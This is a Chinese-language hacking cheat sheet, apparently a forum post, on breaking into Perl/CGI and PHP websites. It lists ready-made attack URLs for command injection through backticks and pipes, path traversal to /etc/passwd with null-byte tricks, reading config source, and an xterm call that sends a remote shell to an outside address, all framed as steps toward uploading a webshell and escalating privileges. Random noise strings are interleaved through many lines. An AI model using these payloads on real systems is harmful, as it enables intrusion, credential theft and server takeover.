总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着 7 q5 F, D5 \( K* }3 _
cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权
# @2 Y& k, F6 O z, x感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们 / M$ ]* G8 V' S, }
注“
, x4 \: y+ K, ^& Lperl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。 8 l$ h3 Q$ `; Z @3 ~, n7 o7 S' b
以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET
; t) t* [3 k: a# P8 v3 j8 R+ T
8 |# g% ?/ l3 ]1 M- h' ~4 Q" E) mhttp://target.com/cgi-bin/home/news/sub.pl?12 随意构造 # d6 M# x: o$ ~: I& I
http://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢
+ q( w0 u9 _% Y$ Qhttp://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号
# G4 n4 r. `: P% j7 }. f% Chttp://target.com/cgi-bin/home/news/sub.pl?`id` ) g: Y; L- ~# r1 {9 m: @$ y, Z, ^
http://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a` + V% e9 b$ a* ]. n' |1 R5 ~ u4 L
http://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示 4 Q' p% U8 u6 i/ f# M; b$ E
0 d" T- C' Q8 Z0 j% B
http://target.com/test.pl;ls| 0 C7 N9 K: g! x: p- F; Y
http://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|
& j1 ] E8 T4 ^ O6 e+ W8 ahttp://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26| + F+ m3 t' E' n/ T. L$ @3 D
http://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造 ( Z% G8 A6 w, d( t( h# k) K- q- l, G
比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。 . m+ \+ f/ s" S) X
http://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection : K. K6 q" [" [/ K+ d
, }* ~; ~9 b0 m
http://target.com/test.pl?&........ /../../etc/passwd 6 M% S8 z7 F7 X* V4 q0 u& f/ I
1 L& U3 z0 K! A3 G* V, Nhttp://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./ # l' ?8 x, F( ^& @ I j
http://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了
& L4 f! z1 N& G: A1 Phttp://www.target.org/cgi-bin/cl ... ../../etc/passwd%00 8 [9 X2 @/ `# H: L8 Z: ?
# |8 W! p; D; P m" s! L
http://www.target.org/show.php?f ... /include/config.php 查看php代码 8 A) Y: h9 n4 e
http://www.target.org/show.php?f ... ng/admin/global.php
& f- R! W* J# }. n' Z$ B/ q
6 r* S$ }! z" f% j; |+ \3 R5 ~4 kemm和ps的一句话( u: U) {( q5 l) K0 B6 I
% u1 i8 \5 z$ S- w& Ahttp://www.target.org/cgi-bin/cl ... /../../../bin/ls%20
; M# p7 `& t+ y# y) [8 P9 T: z1 |0 {8 W
>bbb%20| : x" p' D# q) Q) M9 _, w
7 m1 u2 x$ _+ g; B m- w4 s
http://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串 1 `6 c r5 c) ]% I
0 G+ y7 J& ^. n X+ C m1 r' hhttp://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征
( C# L; P7 f: l2 r) Z3 \http://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin
$ d6 |3 j" q0 s- ~
3 p1 \& g D8 g8 x5 F' L1 O相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法 ! ]. L) S$ w4 r0 s* |. J, m
http://target.com/index.html#cmd.exe $ ^+ k4 O+ L, N7 i6 u1 l
http://target.com/index.html?dummyparam=xp_cmdshell
8 P8 O* M% ~0 \/ q3 H5 rlynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd
3 Y8 J. |2 `, l1 `: f1 Z |